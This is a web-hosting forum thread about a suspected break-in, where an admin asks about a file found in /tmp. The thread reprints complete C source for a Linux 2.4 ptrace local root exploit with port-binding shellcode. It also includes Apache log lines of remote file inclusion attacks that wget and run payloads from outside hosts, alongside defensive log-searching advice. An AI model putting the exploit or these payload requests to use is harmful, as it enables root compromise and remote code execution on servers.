hacked questions ( please help)

[shann]

HI,

I have found /tmp/mptrace.c . WE are running kernel redhat 8 and kernel 2.4.20.

Did they attemp to hack ???

any help is appreciated.

cPanel.net Support Ticket Number:

[ciphervendor]

What are the contents of the file? The name of the file really means nothing.

Also, 2.4.21 is out. It includes a patch for the ptrace vulnerability if your current kernel isn't patched.

cPanel.net Support Ticket Number:

[shann]

This is the code/

#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h> /* For user_regs_struct */

#define SIZE (sizeof(shellcode)-1)

pid_t parent=0;
pid_t child=0;
pid_t k_child=0;
static int sigc=0;

/*
Port binding shellcode, courtesy of <anszom@v-lo.krakow.pl>
I just changed the port no..... =p
*/

char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40"
"\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80\x83\xec\xf4\x89"
"\xc7\x31\xc0\xb0\x04\x50\x89\xe0\x83\xc0\xf4\x50\x31\xc0\xb0\x02"
"\x50\x48\x50\x57\x31\xdb\xb3\x0e\x89\xe1\xb0\x66\xcd\x80\x83\xec"
"\xec\x31\xc0\x50\x66\xb8\x61\x2c\xc1\xe0\x10\xb0\x02\x50\x89\xe6"
"\x31\xc0\xb0\x10\x50\x56\x57\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x83"
"\xec\xec\x85\xc0\x75\x59\xb0\x01\x50\x57\x89\xe1\xb0\x66\xb3\x04"
"\xcd\x80\x83\xec\xf8\x31\xc0\x50\x50\x57\x89\xe1\xb0\x66\xb3\x05"
"\xcd\x80\x89\xc3\x83\xec\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74"
"\x08\x31\xc0\xb0\x06\xcd\x80\xeb\xdc\x31\xc0\xb0\x3f\x31\xc9\xcd"
"\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31"
"\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff/bin/sh";

void sigchld() {
sigc++;
return;
}

void sigalrm() {
fprintf(stderr,"-> Something wrong and it timeout.\n");
exit(0);
}

main(int argc, char *argv[]) {

int i, error;
pid_t pid;

struct user_regs_struct regs; /* Registers Structure */

parent=getpid();

switch (pid=fork()) {

case -1:
perror("Can't fork(): ");
break;

case 0: /* Child's thread -- The attacking thread. */

child=getpid();
k_child=child+1; /* Kernel child's PID... Hopefully.. */

fprintf(stderr, "-> Parent's PID is %d. Child's PID is %d.\n", p
arent, child);

fprintf(stderr, "-> Attaching to %d...", k_child);

/*
Trying to attach to the child spawned by the kernel, which ha
s both
euid and egid set to 0. Child will be sent a SIGSTOP and we,
the 'parent',
will get a SIGCHLD. This process is not immediate. Hence, we
need to
wait before we continue. Otherwise, we will fail controlling
the thread.
*/

signal(SIGCHLD,sigchld);
signal(SIGALRM,sigalrm);
alarm(10);

while ((error=ptrace(PTRACE_ATTACH,k_child,0,0)==-1) && (errno==
ESRCH)) {
fprintf(stderr, ".");
}

if (error==-1) {
fprintf(stderr,"-> Unable to attach to %d.\n",k_child);
exit(0);
}

fprintf(stderr, "\n-> Got the thread!!\n");

/*
Waiting for the firt SIGCHLD, which signals the end of the at
taching action.
*/

while(sigc<1);

if (ptrace(PTRACE_SYSCALL,k_child,0,0)==-1) {
fprintf(stderr,"-> Unable to setup syscall trace.\n");
exit(0);
}

/*
The thread is under our control now. Will wail for the next s
ignal
to inject our own code.
*/

fprintf(stderr,"-> Waiting for the next signal...\n");
while(sigc<2);

if (ptrace(PTRACE_GETREGS,k_child,NULL,&regs)==-1) {
perror("-> Unable to read registers: ");
}

fprintf(stderr, "-> Injecting shellcode at 0x%08x\n",regs.eip);

for (i=0; i<=SIZE; i+=4) {
if( ptrace(PTRACE_POKETEXT,k_child,regs.eip+i,*(int*)(sh
ellcode+i))) {}
}

fprintf(stderr, "-> Bind root shell on port 24876... =p\n");

/*
All done. It's time to leave 'our' poor child alone....
and get ready to kill ourselves...
*/

if (ptrace(PTRACE_DETACH,k_child,0,0)==-1) {
perror("-> Unable to detach from modprobe thread: ");
}

fprintf(stderr, "-> Detached from modprobe thread.\n");
fprintf(stderr, "-> Committing suicide.....\n");

if (kill(parent,9)==-1) { /* This is really ugly..... */
perror("-> We survived??!!?? ");
}

/*
We should be dead by now.
*/

exit(0);

break;

default: /* Parent's thread -- The vulnerable call */

/*
Now, the parent is requesting a feature in a kernel module.
Such action will trigger the kernel to spawn a child with
euid=0, egid=0.... Voila!!!

NB: See <linux/socket.h> for more info.
*/
signal(SIGALRM,sigalrm);
alarm(10);
socket(AF_SECURITY,SOCK_STREAM,1);
break;
}
exit(0);

}

cPanel.net Support Ticket Number:

[ciphervendor]

That's the ptrace exploit code. If that was executed on your machine and you don't have a patched kernel; you're up sh*ts creek without a paddle so to speak.

cPanel.net Support Ticket Number:

[jmc67]

Originally posted by ciphervendor
What are the contents of the file? The name of the file really means nothing.

Also, 2.4.21 is out. It includes a patch for the ptrace vulnerability if your current kernel isn't patched.

cPanel.net Support Ticket Number:

Are there any issues with cpanel and this version of the kernel?

cPanel.net Support Ticket Number:

[shann]

How could I find out, this is has been executed?. Any hel p would be appreciated.

thanks

cPanel.net Support Ticket Number:

[Admin356]

Do a grep on your users domlogs to see where it came in from, if it was owned by nobody, it will have been downloaded via an insecure php application.

Quick shell script to see where it came in from:

#!/bin/sh
for site in `ls /usr/local/apache/domlogs`
do
grep "wget" /usr/local/apache/domlogs/$site >> site-log
echo "$site" >> site-log
echo "$site checked"
done
exit 0


execute that script, then read the site-log after, it will tell you what downloaded it from where. You need to block the IP of the machine being used for the download, usually a free host in Brazil - It would probably have been executed - You will see that in the URL that you find in your domlogs - Usual place is from a clients shoutbox app.

If you don't have a patched kernel, you maybe hacked already.Do a nmap look for open ports that shouldn't be.

Also

ps auxf - and look for processes running under the user "nobody" either modprobe something or the name of the file you removed ie ./kde for example.

Hope that helps.

cPanel.net Support Ticket Number:

[[iG]]

Thanks for the script, you saved me oh so much time.

cp7# cat site-log | grep wget
grep "wget" /home2/usr/local/apache/domlogs/$site >> site-log
200.182.136.2 - - [14/Feb/2004:11:52:31 -0500] "GET /index2.php?page=http://portal1.homeigo.com/accounts/index_1.txt&cmd=wget HTTP/1.0" 200 15707 "-" "Opera/7.23 (Windows NT 5.1; U) [en]"
200.182.136.2 - - [14/Feb/2004:11:52:49 -0500] "GET /index2.php?page=http://portal1.homeigo.com/accounts/index_1.txt&cmd=wget%20-O%20/tmp/bbd%20http://portal1.homeigo.com/accounts/bbd HTTP/1.0" 200 15619 "-" "Opera/7.23 (Windows NT 5.1; U) [en]"
200.103.84.104 - - [14/Feb/2004:18:02:32 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.downloadsmil.hpg.com.br/cgi HTTP/1.1" 200 17398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.103.84.104 - - [14/Feb/2004:18:03:14 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=cd%20tmp;wget%20www.downloadsmil.hpg.com.br/cgi HTTP/1.1" 200 17398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.217.33.8 - - [14/Feb/2004:18:17:48 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.criminalsproject.hpg.com.br/bd HTTP/1.1" 200 17419 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
200.217.33.8 - - [14/Feb/2004:18:18:33 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.criminalsproject.hpg.com.br/bd HTTP/1.1" 200 17419 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
200.199.129.122 - - [14/Feb/2004:18:19:24 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=cd%20/tmp;wget%20http://planeta.terra.com.br/informatica/defacer/cgi;chmod%20777%20cgi;./cgi HTTP/1.1" 200 16790 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


Funny, all brazillian IPs. now the script is removed, i feel secure

[StevenC]

netstat -lntpe

is useful at times to match ports to executables